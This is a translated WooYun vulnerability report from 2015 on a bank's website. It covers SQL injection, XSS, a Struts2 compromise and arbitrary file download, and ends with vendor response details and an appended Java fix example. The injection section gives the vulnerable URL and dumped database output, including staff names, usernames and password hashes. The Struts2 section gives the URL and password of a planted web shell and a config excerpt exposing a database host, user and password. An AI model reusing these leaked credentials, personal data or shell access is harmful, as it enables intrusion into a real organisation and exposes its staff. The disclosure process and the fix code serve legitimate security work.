Vulnerability summary

Defect ID: wooyun-2015-090991

Title: SQL injection / Struts2 vulnerability at a bank

Affected vendor: cccb.cn

Author: sm0nk

Submitted: 2015-01-10 11:57

Fix time: 2015-02-24 11:58

Published: 2015-02-24 11:58

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Handed to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-01-10: Details sent to the vendor; awaiting the vendor's handling
2015-01-15: Vendor confirmed; details disclosed to the vendor only
2015-01-25: Details disclosed to core white hats and experts in the relevant field
2015-02-04: Details disclosed to regular white hats
2015-02-14: Details disclosed to intern white hats
2015-02-24: Details disclosed to the public

Summary:

getshell

Details:

1. SQL injection
http://www.cccb.cn/front/main.action?des=10&method=view&tranCode=240002&tranType=ajax

[Screenshot: 2.jpg]


available databases [7]:
[*] CTXSYS
[*] EP2WEBSITE
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
web application technology: Servlet 2.5, JSP 2.1
back-end DBMS: Oracle
Database: EP2WEBSITE
+------------------+---------+
| Table | Entries |
+------------------+---------+
| PUBVISITDAYLIST | 22951 |
| PUBTRANSLOG | 21114 |
| ARTNEWSINFO | 1667 |
| PUBVISITCOUNT | 1431 |
| VOTBOOK | 145 |
| MGZPIC | 77 |
| ARTCOLUMNINFO | 61 |
| PUBPARAM | 57 |
| CONINFO | 52 |
| PUBMENUINFO | 45 |
| MGZINFO | 21 |
| RECWORKRECORD | 17 |
| CYCMENUINFO | 12 |
| CONLINKMAN | 10 |
| RECEDUCATION | 10 |
| RECAPPLICANTINFO | 8 |
| VOTOPT | 6 |
| CONCLASS | 5 |
| RECFAMILY | 4 |
| USERGROUPINFO | 3 |
| USERINFO | 3 |
| CYCUSERINFO | 2 |
| ORGINFO | 2 |
| RECAWARDSINFO | 2 |
| CYCCONSOLE | 1 |
| PUBNOTICE | 1 |
| RECPOSITION | 1 |
| VOTINFO | 1 |
+------------------+---------+
Database: EP2WEBSITE
Table: USERINFO
[3 entries]
+-----+--------+------------------+--------+----------------------------------+----------+----------+----------+-----------+-----------+-----------+---------------------+---------------------+
| GID | ORG | FLAG | STATUS | PASSWD | USERCODE | USERNAME | USERPOST | PASSERROR | USERLEVEL | BASEGROUP | LASTLOGINTIME | CURRENTLOGINTIME |
+-----+--------+------------------+--------+----------------------------------+----------+----------+----------+-----------+-----------+-----------+---------------------+---------------------+
| 1 | 999999 | 00000000 | 0 | B4BA5283CC2B64521DAFB8248B639882 | admin | admin | NULL | 0 | 00 | 00 | 2015-01-08 10:38:18 | 2015-01-08 10:43:30 |
| 384 | 999999 | 1000000000000000 | 0 | BDE0CE38440C224D5C10497AD365EAE0 | 800433 | 任玉菲 | NULL | 0 | 01 | 01 | NULL | 2014-12-25 09:10:00 |
| 385 | 999999 | 1000000000000000 | 0 | 6D222AADB13C8516C2079486771776EA | 801365 | 吴迪 | NULL | 0 | 01 | 01 | NULL | 2014-12-25 09:10:26 |
+-----+--------+------------------+--------+----------------------------------+----------+----------+----------+-----------+-----------+-----------+---------------------+---------------------+
web application technology: Servlet 2.5, JSP 2.1
back-end DBMS: Oracle
Database: EP2WEBSITE
Table: CONINFO
[52 entries]

2. XSS

[Screenshot: 1.jpg]


3. Struts2
http://www.cccb.cn/front/main.action

[Screenshot: 3.jpg]

http://www.cccb.cn/wooyun.jsp
Password: wooyun

[Screenshot: 6.jpg]

The database password can be found in config.properties:
#database dev service configration
dbUrl=jdbc:oracle:thin:@31.23.36.109:1521:Ep2Web
dbUser=ep2website
dbPass=ep2website
dbSchema=EP2WEBSITE
user_encypt=yes
packagePreName=cn.cccb.appsource
servicePackage=cn.cccb.appsource.service
workunitPackage=cn.cccb.appsource.workunit.app
workapiPackage=cn.cccb.appsource.workunit.api
batchUnitPackage=cn.cccb.appsource.batch
defaultPassword=111111
uploadDir=/home/Ep2Web/uploads
certificatesPath=/home/Ep2Web/certificates

4. Arbitrary file download

[Screenshot: 4.jpg]


Proof:

[Screenshots: 2.jpg, 1.jpg, 3.jpg, 6.jpg, 4.jpg]

Fix recommendations:

1. Filter special characters (injection and XSS)
2. Upgrade the Struts2 framework
3. Access control

Copyright: please credit sm0nk@WooYun when reposting
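A hardened handler for the injection point in item 1, added here as an example that is not the site's code: the request parameters and the ARTNEWSINFO table come from the report above, while the column names, the six-digit tranCode rule and the class itself are assumptions. Rather than filtering characters, it binds the values with JDBC parameters and encodes output for the JSP side of the XSS finding.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.regex.Pattern;

// Hypothetical replacement for the "view" handler behind
// main.action?des=..&method=view&tranCode=..; column names are assumed.
public final class SafeArticleLookup {
    // tranCode in the reported URL is a six-digit number: accept nothing else.
    private static final Pattern TRAN_CODE = Pattern.compile("^[0-9]{6}$");

    public static boolean isValidTranCode(String tranCode) {
        return tranCode != null && TRAN_CODE.matcher(tranCode).matches();
    }

    // Bind parameters carry the values; they can never change the SQL text.
    public static String loadTitle(Connection conn, String tranCode, int des) throws SQLException {
        if (!isValidTranCode(tranCode)) throw new IllegalArgumentException("tranCode rejected");
        // Assumed columns on ARTNEWSINFO (the table itself appears in the dump above).
        String sql = "SELECT TITLE FROM ARTNEWSINFO WHERE TRANCODE = ? AND DES = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, tranCode);
            ps.setInt(2, des);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString("TITLE") : null;
            }
        }
    }

    // Output encoding for the XSS half of item 1: apply when writing untrusted text into a JSP.
    public static String escapeHtml(String s) {
        StringBuilder sb = new StringBuilder(s.length());
        for (char c : s.toCharArray()) {
            switch (c) {
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '&':  sb.append("&amp;");  break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }
}
```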


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-01-15 08:30

Vendor reply:

CNVD confirmed and reproduced the reported issue; it has been forwarded by CNCERT to the Jilin branch center, which will coordinate handling with the organization that manages the website.

Latest status:

None